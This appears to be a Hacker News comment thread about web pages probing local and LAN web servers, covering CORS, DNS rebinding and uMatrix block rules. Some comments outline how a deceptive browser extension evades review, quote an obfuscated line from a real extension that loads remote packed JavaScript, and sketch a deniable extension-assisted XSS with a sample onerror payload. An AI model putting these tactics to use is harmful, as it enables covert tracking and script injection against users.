I can see your local web servers (jameshfisher.com)
652 points by jamesfisher 22 days ago | 190 comments



Another approach is to create a useful extension like:

  https://addons.mozilla.org/en-US/firefox/addon/yt-adblock/reviews/
then disguise the fact that you're inserting an iframe pointing at your web server into every single page the user opens: give your variables and your tracking domain misleading names, and wait an hour after installation before activating (which may also help evade Mozilla's automated tests). Then just sit back and log all the Referers and IP addresses. It's a bit stealthier too, but it needs users to visit their local web servers. You'll also get the full URL.

Nobody will report you, or care about the report, and users are barred from fixing the extension code locally even if they're able to review it themselves. Bad reviews with some actual text fade away quickly, so even if someone warns your other users, the warning will be pushed out to page 2 after a while by other useful one-word or empty reviews, and it will all work out.


Very nice catch. I examined it a little more. Line 16 of scripts/yts.js seems to be the backdoor.

  enableButton.src = '//remove' + '.' + 'video/webm';
So the owner of this addon has the remove.video domain. At https://remove.video/webm there's packed JavaScript code. When I unpacked it I got this: https://paste.ubuntu.com/p/C24bZc9Cn7/

There's a base64-encoded domain list in the packed JavaScript. Here's the list of domains: https://paste.ubuntu.com/p/RMKd8Ms5QQ/


From my experience as a dev (who has submitted extensions to Mozilla), this will be sorted out. However, it can take 4-6 weeks until an actual human being reviews the changes. But it does get reviewed.


Last updated "5 months ago (Dec 16, 2018)".

One would hope that reporting an extension would get it reviewed sooner, especially when it's the 26th top-rated one and all that's needed is to verify the claims in the report.


Is there any way to get the source code of extensions from the Mozilla website? I think some years ago you could view the code in your browser from a link in the version history, but I don't see any such links now.


Right-click the "Add to Firefox" button and use "Save As...". This will get you an .xpi file, which you can unzip and inspect.

Many addons use some packing method and bundle all kinds of stuff into their content scripts (jQuery, etc.). That can make them hard to review.

Some addons are quite horrifying (you see things like `<span ...>${someText}</span>` with no escaping). I'm quite sure there are content scripts out there with XSS issues that can be triggered from the page itself. That's great on pages like GitHub, where there's plenty of user-controlled content.

So if you want a suggestion for a clever attack:

1] Make an extension for Facebook, Twitter, or GitHub that reorganizes the wall somewhat, and make a `mistake` like assigning some user-controlled content via innerHTML. This will probably pass review.

2] Suggest your addon to your target.

3] Post your payload as a message/tweet/whatever to your target. Now you have extension-assisted XSS.

Pretty easy to add XSS to any page, with plausible deniability.
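The `mistake` in step 1] can be made concrete. A minimal sketch (the helper name `escapeHtml` and the sample payload are mine, not taken from any real extension):

```javascript
// Hypothetical content-script fragment. Assigning untrusted text via
// innerHTML executes whatever markup it contains:
//   postEl.innerHTML = comment.body; // XSS if body is "<img src=x onerror=...>"
// The "honest" version escapes first (or just uses textContent):
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[ch]);
}

const payload = '<img src=x onerror=alert(1)>';
console.log(escapeHtml(payload)); // rendered as inert text, not markup
```

In review, the innerHTML assignment just looks like a sloppy but common idiom, which is exactly what makes the attack plausible.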



Hopefully that sort of shenanigans would fail AMO code review.


This is not a hypothetical but a smoking gun. That plugin really does those things.


what is meant by, "users are banned from fixing the extension code locally"? i download and modify other people's extensions all the time.


Probably the signing requirement for release builds of Firefox.


Nice this will be fun


If you use uMatrix, you can easily block the localhost and local network "sniffing" with the following rule[0]:

  * 127       * block    ### block access to IPv4 localhost 127.x.x.x
  * localhost * block
  * [::1]     * block    ### block access to IPv6 localhost
  * 192.168   * block    ### block access to LAN 192.168.x.x
In principle, you can use this without any other blocking, i.e. with the rule:

  * * * allow
and hence without disabling javascript on any sites.

[0] https://github.com/ghacksuserjs/ghacks-user.js/wiki/4.2.3-uM...

Edit: as pointed out by DarkWiiPlayer below, if you want to be able to access the localhost websites from the same browser, you need:

  localhost localhost * allow
and similarly for the LAN. In full:

  127       127       * allow
  localhost localhost * allow
  [::1]     [::1]     * allow
  192.168   192.168   * allow


Also, uBlock has an option in its settings to block the webrtc leak (but not enabled by default):

"Prevent WebRTC from leaking local IP addresses"


Add all the RFC 1918 unroutable private networks (plus loopback).

https://en.wikipedia.org/wiki/Private_network

    10.0.0.0 - 10.255.255.255 (10.0.0.0/8)
    172.16.0.0 - 172.31.255.255 (172.16.0.0/12)
    192.168.0.0 - 192.168.255.255 (192.168.0.0/16)
    127.0.0.0 - 127.255.255.255 (127.0.0.0/8)
https://tools.ietf.org/html/rfc1918

Possibly also 100.64.0.0/10 for carriers.

https://tools.ietf.org/html/rfc6598#page-8
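For anyone scripting this outside uMatrix, the ranges above are straightforward to check. A sketch (the function name is mine):

```javascript
// Classify an IPv4 address as private-use/loopback, per the ranges
// listed above (RFC 1918, loopback, and RFC 6598 carrier-grade NAT).
function isPrivateIPv4(ip) {
  const parts = ip.split(".").map(Number);
  if (parts.length !== 4 || parts.some((n) => !Number.isInteger(n) || n < 0 || n > 255)) {
    throw new Error(`not an IPv4 address: ${ip}`);
  }
  const [a, b] = parts;
  return (
    a === 10 ||                           // 10.0.0.0/8
    (a === 172 && b >= 16 && b <= 31) ||  // 172.16.0.0/12
    (a === 192 && b === 168) ||           // 192.168.0.0/16
    a === 127 ||                          // 127.0.0.0/8 (loopback)
    (a === 100 && b >= 64 && b <= 127)    // 100.64.0.0/10 (CGNAT, RFC 6598)
  );
}
```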


Possibly also the IPv6 ULAs:

https://en.wikipedia.org/wiki/Unique_local_address

Not sure if those can be expressed in uMatrix as a prefix rule.


Presumably also:

    * 10      * block    ### block access to LAN 10.x.x.x


uMatrix blocked all of it for me by default.


Yes, but by default uMatrix might be overly strict for many people. For instance, by default it blocks all third-party javascript.


that's awesome, using it!

but to be fair, the point seemed to be more that if you run something that's "only" exposed locally... don't. Securing each and every machine with uMatrix doesn't seem like the answer to this.


you'd need at least

    localhost localhost * allow
to be able to open sites on localhost directly.


Anyone know if this can be done on a hosts level instead of a browser level?


It can’t. At best you can try to modify the hosts file to point localhost to somewhere bogus, but aside from the potential breakage that could cause, it won’t help against any site that simply accesses http://127.0.0.1 instead of http://localhost. In general, the hosts file can be useful for quick-and-dirty blocking, but it’s not really capable of enforcing a security barrier.

Edit: But there may be other ways to do it at an OS level, depending on your OS.
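To illustrate why the hosts file can't enforce this (a hypothetical fragment):

```
# /etc/hosts: even pointing localhost somewhere bogus...
0.0.0.0    localhost
# ...does nothing against a page probing http://127.0.0.1:3000 directly,
# since literal IP addresses never consult this file.
```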


"If you see any results like 192.168.0.4:3000 is available!, you should tell your colleague to secure whatever she has running on that port"

Someone's going to access this page at $BIGCORP with an overly trigger-happy IDS and get a fun morning meeting with IT to un-quarantine their machine.


Yup, excited for the meeting. Haven't seen those guys in a while.

Was expecting to learn some security techniques, instead got essentially port scanned :)


Whereas I'm learning that my network is fairly secure against this type of port scanning.


Of course, mine was too. I'm sure in part due to the diligent security team that will be stopping by my desk in the next few days!


Since I work from home I'm both the security team and the guy who inadvertently ran a port scanner in his web browser.


edit: I am a dolt. Thank you :)

I got this address as well, do you have anything running on .4?

It's just weird because I have .1 router, .2 AP, .3 pi-hole

then .10 is when I start my static IPs

and .100 is where my dhcp starts

nmap says that host is down as well


That's just the example in the description, not the scan results.


I think that's just the hardcoded example in the text, considering it's still there when I viewed with no scripts enabled (and I'm on a network that doesn't have anything assigned in 192.168.0.0/16).


The page is using JavaScript with the WebRTC interface RTCPeerConnection[0]. Maybe that can help.

[0] https://developer.mozilla.org/en-US/docs/Web/API/RTCPeerConn...


Judging by the "ReferenceError: webkitRTCPeerConnection is not defined" message in my browser, it probably uses WebRTC to get your local IP subnet. I installed an add-on to block WebRTC after I watched a presentation on this tool [1][2], and I recommend you do the same, unless you actively use WebRTC (and don't want the hassle of toggling a switch).

Unfortunately the protocol is vulnerable by design. :(

[1] https://portswigger.net/daily-swig/new-tool-enables-dns-rebi...

[2] https://www.blackhat.com/asia-19/arsenal/schedule/#redtunnel...


The only thing blocking WebRTC gets you is that it hides which subnet you are on, right? An attacker can still just enumerate all of the common ones (10.0.0.0/24, 192.168.0.0/24, and about five others) and get the same results as with WebRTC enabled. So blocking it really just slightly increases the obscurity, but not really the security.
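A sketch of the enumeration in question; the subnet list is illustrative (defaults I'd expect from common routers), not from the article:

```javascript
// Without WebRTC, an attacker can simply guess: a handful of default
// subnets cover most home networks. Build the gateway URLs a scanner
// would probe first (the .1 of each subnet).
const commonSubnets = [
  "192.168.0", "192.168.1", "192.168.2",
  "10.0.0", "10.0.1", "10.1.1", "172.16.0",
];

function candidateGateways(port = 80) {
  return commonSubnets.map((net) => `http://${net}.1:${port}/`);
}

console.log(candidateGateways(8080)[0]); // http://192.168.0.1:8080/
```

Anyone on a non-default subnet escapes this list, which is the "obscurity" the comment above refers to.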


Sure, but it helps and it is cheap. I also don't use a common subnet and enjoy uMatrix. Obscurity is a viable strategy as part of a layered defence. ;)


True.

My main problem is that blocking WebRTC blocks some very interesting methods to "re-decentralize" the web, which are only viable if most people don't have it disabled.


This is a classic conflict that I’ve observed a lot. Similarly, widespread SSL pinning and app sandboxing makes it difficult to reverse engineer opaque outgoing traffic. It might be more secure, but you also cannot easily inspect what data a sandboxed, cert-pinning service is sending to the outside world.

I think it’s probably something like “security, privacy, anonymity... pick two.”


Nope, you can't:

    Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at http://localhost/. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)

Anyway

    TypeError: /(192\.168\.[0-9]+\.)[0-9]+/.exec(...) is null i-can-see-your-local-web-servers:169:41


The cross-origin check can be circumvented via DNS rebinding: when you request mypage.com, my DNS returns the IP of my webserver. On all subsequent requests, it returns 127.0.0.1. Now localhost is on the same origin as my page.


It doesn't matter, you should be in control of a DNS the user relies on and you should have your server send

    Access-Control-Allow-Origin: mypage.com
or

    Access-Control-Allow-Origin: * 

which is not the default anywhere AFAIK, and it's domain-based, not IP-based

And your server should be enabled to respond to mypage.com host header


Based on m12k's suggested interpretation of your comment:

> you should be in control of a DNS the user relies on

You always are when a user visits your domain – you control the DNS of your domain.

> Access-Control-Allow-Origin: *

You don't need access-control headers, because you stay on the same domain.

> Your server should be enabled to respond to mypage.com host header

Most servers listening on localhost ignore the host header.


> You always are when a user visits your domain – you control the DNS of your domain.

I meant you need to control the poisoned DNS

If I use 8.8.8.8 as DNS you can only work on the domains you already control, which is kinda useless

> You don't need access-control headers, because you stay on the same domain.

No, you don't

My localhost server only responds to the localhost and 127.0.0.1 host headers

Not to mypage.com

Nginx does that too by default

https://github.com/nginx/nginx/blob/master/conf/nginx.conf#L...

But even if you did, you still haven't resolved the issue: you can't make a call to a different domain without access-control headers, unless it's the same domain

you can't load mypage.com and then fetch from www.mypage.com, even if you resolve www.mypage.com to 127.0.0.1 the browser won't let you do it


> But even if you did, you still haven't resolved the issue: you can't make a call to a different domain without access-control headers, unless it's the same domain

> you can't load mypage.com and then fetch from www.mypage.com, even if you resolve www.mypage.com to 127.0.0.1 the browser won't let you do it

In this part you're confusing what a rebinding attack is: by serving a DNS response with a short TTL, an attacker is able to associate two different IPs with the same query, thus it'd be mypage.com and mypage.com (not www.mypage.com), bypassing the same-origin restrictions of browsers.

https://capec.mitre.org/data/definitions/275.html


> In this part you’re confusing what a rebinding attack is: by serving a DNS response with a short TTL an attacker is able to associate two different IPs

But it doesn't really work.

I query my DNS, on my home router, not your DNS.

And the DNS on my home router query the ISP's DNS, which caches requests.

I bet you can't go below a few minutes' resolution.

I had this problem when validating the Letsencrypt DNS challenge, I had to let certbot run for almost 20 minutes before my home router picked up the new value.

When I'm at work, I use the company's DNS, which ignores non-standard TTLs, caches the first answer forever (well... almost), and disallows external domains that resolve to reserved IP addresses.


Depends on the resolver configuration. E.g.: unbound has cache-min-ttl, a way to increase cache efficiency (and a mitigation for attacks such as rebinding).

> Time to live minimum for RRsets and messages in the cache. Default is 0. If the minimum kicks in, the data is cached for longer than the domain owner intended, and thus less queries are made to look up the data. Zero makes sure the data in the cache is as the domain owner intended, higher values, especially more than an hour or so, can lead to trouble as the data in the cache does not match up with the actual data any more.

Which is one of the reasons I think this is mainly effective against home networks.
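The cache-min-ttl behaviour quoted above can be sketched as a toy resolver cache (class and knob names are mine, modelled loosely on unbound's option):

```javascript
// Toy stub-resolver cache illustrating TTL clamping as a rebinding
// mitigation: with a minimum TTL in force, the attacker's second
// answer (127.0.0.1) is never fetched, because the first one stays
// cached past the attacker's short TTL.
class DnsCache {
  constructor(cacheMinTtl = 0) {
    this.cacheMinTtl = cacheMinTtl;
    this.entries = new Map(); // name -> { ip, expires }
  }

  // `now` is in seconds; `upstream(name)` returns { ip, ttl }.
  resolve(name, now, upstream) {
    const hit = this.entries.get(name);
    if (hit && hit.expires > now) return hit.ip;
    const { ip, ttl } = upstream(name);
    this.entries.set(name, { ip, expires: now + Math.max(ttl, this.cacheMinTtl) });
    return ip;
  }
}
```

With `cacheMinTtl` at a few minutes, a rebinding domain serving ttl=1 answers keeps resolving to its first (public) IP for the whole clamp window.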


Wait, doesn't the certbot DNS challenge query the nameservers of the domain being checked, not your local DNS resolver, otherwise my fast DNS challenges should fail?


Not by default [1], but you can set it to what you prefer.

But in my case my network is configured to always reach the in house DNS first, to keep latency low

[1] https://github.com/letsencrypt/boulder/blob/8167abd5e3c7a142...


The short TTL is very sketchy, and most NIDSs have contextual rules to detect DNS rebinding attacks. One may additionally filter private ranges from responses and HTTP requests by host headers. Not to mention TLS.

It's useful against vulnerable IoT devices or home routers, but is it still effective to breach enterprise perimeters?


I don't quite understand your comment. Do you mean "shouldn't" whenever you wrote "should"?


I think they write 'should' when they mean 'need to if you want the aforementioned to be a practical attack vector'


yeah, I meant need, sorry


This is the reason why my local DNS resolver won't allow returning private IP space (including localhost).


The post specifically mentions CORS and shows an example Express app that has CORS enabled.


CORS is not enabled by default anywhere. I have a few servers running right now on my laptop and the page can't see any of them, because all of them have CORS disabled.

The first thing you do when you enable CORS is configure it to respond only to specific domains, so that when you deploy to production you don't leave it open by accident.

BTW, if you enable CORS as in the 'simple usage' section of the docs, chances are the home page is a blank page and there will be nothing to steal.
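The "only respond to specific domains" practice can be sketched like this (the allowlist contents and helper name are mine):

```javascript
// Reflect the Origin header back only for known-good origins;
// every other origin gets no Access-Control-Allow-Origin at all,
// so the browser refuses to expose the response to it.
const allowedOrigins = new Set(["https://app.example.com"]);

function corsHeaderFor(requestOrigin) {
  return allowedOrigins.has(requestOrigin) ? requestOrigin : null;
}
```

A server would call this per request and set the header only when the helper returns a value, which is effectively what most CORS middleware does with an origin option.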


Recently I was testing a client-side algorithm that pulled a lot of data from the server. I thought my HTTP server might be the bottleneck, so I spun up a few copies of the server, but had to enable CORS to get the client talking to them all. Newbies like me don't realise that localhost + CORS = exposed to the web, so this article was very surprising and useful. This app is only used internally, so your deployment justification doesn't apply in this case, but I will definitely make sure only specific domains are exempted in the future, thanks to this article.


I started a local webserver listening on localhost:80 just to see what happens, but this thing seems to not detect it. It shows me "Scanning localhost ... localhost complete."

Edit: My guess is that this thing can only detect servers that send a CORS header that permits cross domain access.

It could probably do way better detection if it did not do xhr requests but added script/css/whatever elements to its own page pointing to localhost and detects if those error out.


CORS is a security mechanism for browsers to prevent leaking user information (e.g. cookies) when making cross-domain requests from a browser. CORS does not prevent accessing the server at all. You can always curl a CORS-protected server, but you won't be able to make requests including the user's cookies from a disallowed domain.


Hmmm...

I can see the request in server logs, but it seems CORS is preventing the response.

I may be missing something.


The way this is set up, it's enumerating systems and ports on internal networks, not actually accessing those systems and ports. The CORS header (or lack thereof) in the HTTP response of the requested item dictates whether it can be read. The page first sends a preflight (OPTIONS) request to get the headers for the endpoint; if CORS is set up to allow cross-domain access, the connection proceeds (or, if it's a request to the same domain and CORS for the current page isn't too restrictive, the initial request is allowed without a preflight).

What you see in the browser developer tools, if you open them, is that a bunch of requests are being made but denied because they fail CORS checks.

Where data is leaked (in the security sense) is that there's a difference in how the responses are handled. Either the request is allowed (because the remote side's CORS is too loose), in which case the page shows a message that the specific host/port combination is available; or it gets no response and times out, in which case the page stops checking that host and assumes there's nothing at that IP (that's when it prints the "unreachable" message); or it continues on with the next port. If at the end there's been no success and no timeout, it prints the "complete" message, and that means there's probably something at that IP.

An important thing to note is that CORS is not like a firewall; it doesn't actually stop all traffic from happening, so it can sometimes be used to get additional information that's not necessarily meant to be exposed. That said, what the page is showing is that the specific way CORS functions (that is, asking the remote side if it's accessible), combined with the fact that JavaScript runs locally in your browser, leads to some interesting interactions that can cause security concerns.

As an idea of how this could be used for more nefarious ends: if it found listening and accessible servers on localhost or the local network, it could then try to identify them based on the headers/content returned, and try to do something with that.

Given that you could possibly even compile a network vulnerability scanner/exploiter to WASM and use it for only the subset of vulnerabilities exploitable through plain HTTP requests (a lot of work; it's probably easier to just write your own shim and crib their exploit library), this could be very easily weaponized.
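The inference described above boils down to a small decision table. A sketch (the outcome names are mine; a real scanner would derive them from how the request promise rejects and how long it takes):

```javascript
// A scanner never needs to read the response body: the *failure mode*
// of a cross-origin request already leaks information about the target.
function classifyProbe(outcome) {
  switch (outcome) {
    case "response":     // CORS allowed the read: open AND misconfigured
      return "service reachable and readable";
    case "cors-error":   // request completed, browser blocked the read
      return "something is listening (host is up)";
    case "conn-refused": // immediate refusal: host up, port closed
      return "host is up, port closed";
    case "timeout":      // no answer at all
      return "probably no host at this address";
    default:
      return "unknown";
  }
}
```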


That all makes sense, but the OP said that the scan didn’t identify their HTTP server. I wonder why.


Well, the "Scanning localhost ... localhost complete." which they report means it found the server but was not allowed access (CORS-restricted). This is normal, as the default behavior, unless modified by a CORS header, is that cross-origin resource sharing is disallowed, and that includes the same host on a different port. I believe the edit is correct, in that this demonstration is for finding poorly configured local services that have a CORS header that is too open (perhaps because multiple services are meant to interact with each other).


Well yeah, but CORS prevents his demo from working. And you cannot curl something remotely when it only binds to 127.0.0.1.


I started `python -m SimpleHTTPServer 5000` and the site reports nothing, but I get `127.0.0.1 - - [28/May/2019 22:14:51] "GET / HTTP/1.1" 200 -` each time I refresh the page. So it sends a request that is received by the server but somehow doesn't register on the site.


Because your browser is preventing the javascript from accessing the response.


I wonder if one can read the response via the time side-channel attack.


> Scanning localhost ... localhost complete.

Yet I am running Node.js http-server[1], and see the request in the logs:

    [Tue May 28 2019 23:56:54 GMT-0500 (Central Daylight Time)] "GET /" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
[1] https://github.com/indexzero/http-server


I started some as well, it didn't find anything.


It's not that it doesn't detect it; it's that it's not open to external networks, which I guess is a good thing.


What do you mean?


Probably that your browser is blocking access to the local domain, from the context of an external domain. I'm just guessing here, of course.


I'm interested in this because I don't fully understand the consequences here. I'd like to gain a deeper understanding through some concrete examples.

With the PHP CLI, I can run:

    php -S localhost:8000
With Python3, I can run:

    python -m http.server 8000 --bind localhost
The demo fails for me in both cases, even though a request to localhost:8000 is sent. (EDIT: The server log in the terminal window does show that the request arrived at the local server).

My question is: What is the risk of running one of these servers and then visiting some random web page?


> My question is: What is the risk of running one of these servers and then visiting some random web page?

It depends on what you're exposing on those ports. If it's something sensitive, stop. Any web page can run javascript and as such, any web page has access to every port and service that your machine has access to ... because at that point, the web page is a program running on your machine with full network access.

However, this entire "vulnerability" makes no sense to me. Even if I'm running something on my machine or local network, I am not going to rely on the firewall as a security mechanism. That is profoundly stupid and is well known to be profoundly stupid. So all those servers, including the ones I am creating and running, will have their own security mechanisms. So you can ping my server? So what?


If it's got CORS enabled you can do a hell of a lot more than ping your server.


Wait, what? I think you mean the opposite. If it's got CORS enabled, then you can't do anything unless the request originates from the relevant domain.

Anyway, do not rely on firewalls (and CORS is a firewall) as the sole security measure. Do not create unauthenticated endpoints unless you want everybody to use them.


To elaborate, I meant a permissive CORS policy, which is what I see most often.


Worst case they proxy all of the requests and can essentially access anything open on the port. For me it's all development stuff, so if they want access to a broken-half-the-time application with mock data then whatever.

However they'd have to know the routes to request to (or proxy all requests and do it in realtime) which isn't very likely if it's just some development application specific to you.

Basically there really isn't much risk if you aren't exposing anything interesting. Maybe if you're working on something proprietary it could be leaked?

Either way, you may as well reconfigure your applications if the webpage can detect them; the risk is low but still real.


I only ever run my local dev server on port 80, and use a hosts file to assign custom (fake) domain names to each of the sites I want to run.

I mentioned as much here a few years ago when I first came across this idea of assigning (and remembering) random unique port numbers to every one of your apps in development, and was surprised to hear that it's such a common practice. It seems sub-optimal for a lot of reasons, beyond the obvious one noted in the article.

The big one for me is that none of my apps need to know anything about how to handle port numbers in URLs. They know their own domain name via a config setting that can be flipped on the live server. It's the same pattern (with no colons or numbers to worry about), so there are no edge cases to test.


Unless I'm missing something, this only works if you are running one site at a time, or you have a single web server bound to port 80 that supports virtual hosts. You also need application and/or configuration support to get this working properly. And even then, if you run any software with an embedded web server you are usually out of luck unless you want to fiddle with a reverse proxy configuration.

For these reasons I, at least, simply run applications on different ports. The problem isn't the port, it's the web browser allowing cross domain requests to local networks by default (another reply here suggested it is WebRTC specifically that is flawed).


For a professional web developer, setting up an Nginx reverse proxy for a few apps should be reasonably efficient. Chances are that most or all of them are written in the same language, and configuration can be copy/pasted between them. Or a subdomain pattern can be mapped onto a directory pattern, so there is really only one configuration: just add a new directory and a matching subdomain starts working, assuming the right wildcard DNS entry is pointed at your localhost.
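A hypothetical nginx server block for the pattern described above (the domain, app name, and upstream port are illustrative):

```nginx
# One vhost per app; to add another, copy the block and change
# server_name and the upstream port.
server {
    listen 80;
    server_name app1.dev.local;

    location / {
        proxy_pass http://127.0.0.1:3001;
        proxy_set_header Host $host;
    }
}
```

The app itself then only ever sees a plain hostname, which is the "no port numbers in URLs" benefit mentioned earlier in the thread.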


IIS handles all this out of the box for me. I just bind the host name to the site in question. It sounds like maybe this isn’t something that other web servers do, which is surprising. The whole point of the operation is to seamlessly run 30 odd websites on one dev machine without needing to fiddle with port numbers or anything else.


In the *nix world and with the move to containerization, most applications now assume they are the only thing running on the web server, and therefore demand custom config/settings. Node apps for example are their own server.


This is more or less what I do, except instead of 80, I use a port above 1024 because those don't require root privileges to bind to: https://www.w3.org/Daemon/User/Installation/PrivilegedPorts....

I'm sure the Container Culture Kids have their own overly-complicated thing, though.


The page doesn't do a great job of explaining the mechanism (which from a quick glance seems to involve WebRTC).

This is a better resource on this topic, which involves DNS rebinding: https://medium.com/@brannondorsey/attacking-private-networks...

DNS-rebinding also gets around the cross origin request issue, which some comments here mention.


I used to scan the company network for Selenium servers and remotely open "inappropriate" pages. Always nice to see a coworker wonder why a browser window with images of Pooh opened up.


I hope you're not in China!


Makes you wonder what other apps are accepting local HTTP connections (e.g. vendor bloatware [1]).

[1] https://support.lenovo.com/th/th/product_security/len_4326


When will software engineers finally understand that issues like these aren't problems with some random service you run on your computer, but with the (lack of) security model behind modern web browsing?


Modern web browsing provides for this with same-origin policy. Same-origin policy can be negated by the server if it sets an overly lax CORS directive.

So this is something that's secure by default, but can be broken if the "random service you run on your computer" decides to break it. I don't think that's an issue with the browser's security model.


Same-origin policy is not a security model. It's a ridiculous quarter century old hack. If you pause to think about it, domain names are a horrible way to delineate security boundaries on the web.


I disagree about domain names, but I don't think that's even relevant to this discussion.

Do you have some kind of security model in mind that would work better than same-origin policy in this case? I.e. cross-origin requests are still allowed to happen somehow, but users are still protected against random services intentionally disabling your security measures?


It is bloody obvious that when people spin something up on their local machines they do not intend to make those pages available to every website they visit. This by itself suggests that there should be a dedicated security context for such applications, and that the restriction on information exchange should be based on that context, not on some random thing the application does (like authentication, CSRF protection, or sending CORS headers).

Scenarios like that should be the foundation of a sensible security model, not an afterthought achieved by applying layers and layers of security duct tape in every single instance.


>an afterthought achieved by applying layers and layers of security duct tape

This is where you're missing the fundamental nature of the issue in this article. The sensible security model is there by default. An additional layer is added to make a resource available cross-origin, and the article merely serves to remind people that making a resource available cross-origin is still making it available cross-origin when the origin is localhost.


>Not on some random thing the application does (like authentication, CSRF or sending CORS headers).

Sending CORS headers isn't "some random thing" though, it's specifically the one thing that stops the security model that's in place from working.

There's a lot of bad security practices that you could define as "some random thing", and the fact that some people might do that thing doesn't make the whole model around it invalid.


I can see the list of XHR requests made, and I have half a dozen local web servers running, and there are a bunch of other web servers running on my network. I have a bad habit of spinning up a server on an ESP32 whenever I want to remote control something physical.

... Strangely, despite the XHR's hitting ports and IPs I know are running unsecured web servers, the site sees nothing. Lots of "unreachable".

Firefox 67.0, Arch Linux (5.0.10).


The requests should fail unless the servers you are running allow CORS as per the headers.


There's half a dozen that are.


Do you have any locked down policy on them though? I assume this would only work if you gave blanket access.

I noticed in my tests it found one on port 3000 with blanket access, but didn't see one on port 9999 with restricted access (policy => allow from *.mydomains).


Yes. I'm terrible and have them set to allow all domains, and all methods.


Maybe your browsers are up-to-date?


Anyone using uBlock origin can add these custom rules to protect localhost:

  * localhost * block
  localhost localhost * allow
This should block any non-localhost from accessing localhost.

(note: only protects you superficially, based on DNS. what we'd want is protection based on IP. otherwise you're still exposed to anyone setting their own DNS to 127.0.0.1. but it's something...)


Here's a question I've had for a while: WHY in the world do web browsers not block access to localhost? What exactly is the extremely compelling use case that has prevented them from blocking this?


There are a fair number of applications that expose a UI with a local web server. I use the Ubiquiti Controller, but it's also quite common in the world of Plex, etc. It's also a path used for local OIDC, such as with the gcloud CLI.


> expose a UI with a local web server

I'm not talking about UIs hosted on local web servers being able to send requests to themselves, I'm talking about UIs hosted on REMOTE web servers being able to send requests to local ones. It seems far worse than a random cross-origin request to me and for the life of me I can't imagine uses cases.


That's not really how the internet works.

What is a local webserver? Running on your machine? Running on your LAN? Running on your corporate intranet? How should a browser differentiate between these things?

What qualifies as a remote server? Did you know, some very large enterprise environments squat on public IP's for private intranet internally due to address space exhaustion (IPv4 anyway)? Just because something appears to be on a public address doesn't mean it actually is.


It seems like an obvious measure would be for sites served outside the private-use or loopback ranges to be unable to request content from servers in private-use or loopback ranges.

> Did you know, some very large enterprise environments squat on public IP's for private intranet internally due to address space exhaustion (IPv4 anyway)?

Sucks to be them. If they've exhausted their private use IPv4 addresses, they can either rest comfortably knowing that NAT and IPv6 can solve their problem or they can ignore IETF recommendations and build a card house network that breaks if you give it a stern look.
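For what it's worth, the "private-use or loopback" test proposed above is mechanical. A sketch (my own helper, not code from any browser; IPv4 only):

```javascript
// True for addresses a browser could treat as "local": the 127.0.0.0/8
// loopback block, the RFC 1918 private ranges, and 169.254.0.0/16 link-local.
function isPrivateOrLoopback(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(n => !Number.isInteger(n) || n < 0 || n > 255)) {
    return false;
  }
  const [a, b] = parts;
  return a === 127                          // 127.0.0.0/8   loopback
      || a === 10                           // 10.0.0.0/8    private
      || (a === 172 && b >= 16 && b <= 31)  // 172.16.0.0/12 private
      || (a === 192 && b === 168)           // 192.168.0.0/16 private
      || (a === 169 && b === 254);          // 169.254.0.0/16 link-local
}
```

The hard part isn't the check, it's the policy around it (DNS rebinding, proxies, IPv6), but the ranges themselves are well defined.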


My preferred solution would be to disable javascript altogether.

> Sucks to be them. If they've exhausted their private use IPv4 addresses, they can either rest comfortably knowing that NAT and IPv6 can solve their problem or they can ignore IETF recommendations and build a card house network that breaks if you give it a stern look.

This will only lead to organizations running IE7 (or whatever outdated IE version is most common now) forever.


> My preferred solution would be to disable javascript altogether.

My preferred solution would be not to use web browsers at all, but our preferred solutions are much harder to make a case for than a simple security policy.

> This will only lead to organizations running IE7 (or whatever outdated IE version is most common now) forever.

In general, let's let them make that choice, but this could be configurable in the browser in the same way Javascript and cookie policy exceptions are handled.


This makes no sense. I'm just talking about localhost, I don't care where the physical computer is. It makes no difference if you're an enterprise with software running on a private or public or whatever IP. Whatever the case, I still don't see why you should be able to use JS to access a localhost address.


But what if your webserver is bound to 0.0.0.0:80? Which IP ranges do you block? Just the lo interface? Well, that wouldn't prevent this exploit as the webserver would be listening on all of your IP addresses.


What? Nobody cares what the listener is listening to. Nobody even cares if a listener even exists. It's completely irrelevant. You just block the outgoing request if it's sent to a localhost address from a non-localhost address. What's so complicated about this?


If you're suggesting that anything not originating on an enumerated list of IPs for localhost cannot request a URL that resolves to an entry in an enumerated list of IPs for localhost, that would be possible, but is not really representative of the entire surface area of the effect demonstrated in the article.

It's also entirely possible you have some development api running on a particular port on localhost, and some app running in a container or VM that wants to make calls to it.


> is not really representative of the entire surface area of the effect demonstrated in the article

So let's let perfect be the enemy of good? What's the logic here? Let's leave a huge security hole because we can't achieve perfection in all scenarios?

> It's also entirely possible you have some development api running on a particular port on localhost, and some app running in a container or VM that wants to make calls to it.

The VM should be on localhost or you should jump through a few hoops to whitelist it somehow. I see no reason why this should be allowed by default.


> So let's let perfect be the enemy of good? What's the logic here? Let's leave a huge security hole because we can't achieve perfection in all scenarios?

The logic here is don't hastily start implementing changes to how http requests currently work without a well established plan for doing so. I think there would be a good deal of corner cases you need to account for to successfully implement this feature.

Anyway, this problem seems pretty obvious, and I'm sure this discussion has been had elsewhere already.


> The logic here is don't hastily start implementing changes to how http requests currently work without a well established plan for doing so.

As if the point of this thread was to push browser vendors to hastily implement this without thinking it through? Are you just trying to find something to have an argument over? I'm tired of this.


IIRC Dell uses this to load support information into its site. It's a reason, not saying it's a good one.


While I think it would be a shame to completely disable the ability for remote sites to access localhost (I'm sure it can be useful somehow), it would make far more sense to be opt-in for those cases.

Maybe browsers should assume a CORS deny all unless otherwise specified?


quick development? some of us use localhost to quickly test/develop.


They do...

[Error] Failed to load resource: Origin http://http.jameshfisher.com is not allowed by Access-Control-Allow-Origin. (localhost, line 0)


Or it could be like what happens if you access a site with a broken SSL cert - you get a big red warning page and you're only allowed to continue after clicking some tiny technical option.


Caching reverse proxies for local virtual machine use, in my case. Primarily used for Linux repos, but also configured for personal use, eg for webcomics.


That's about as far from a compelling reason as you can imagine for the browser to allow this by default.


Some browsers apparently do, which is why this demo isn't working for some HN users.


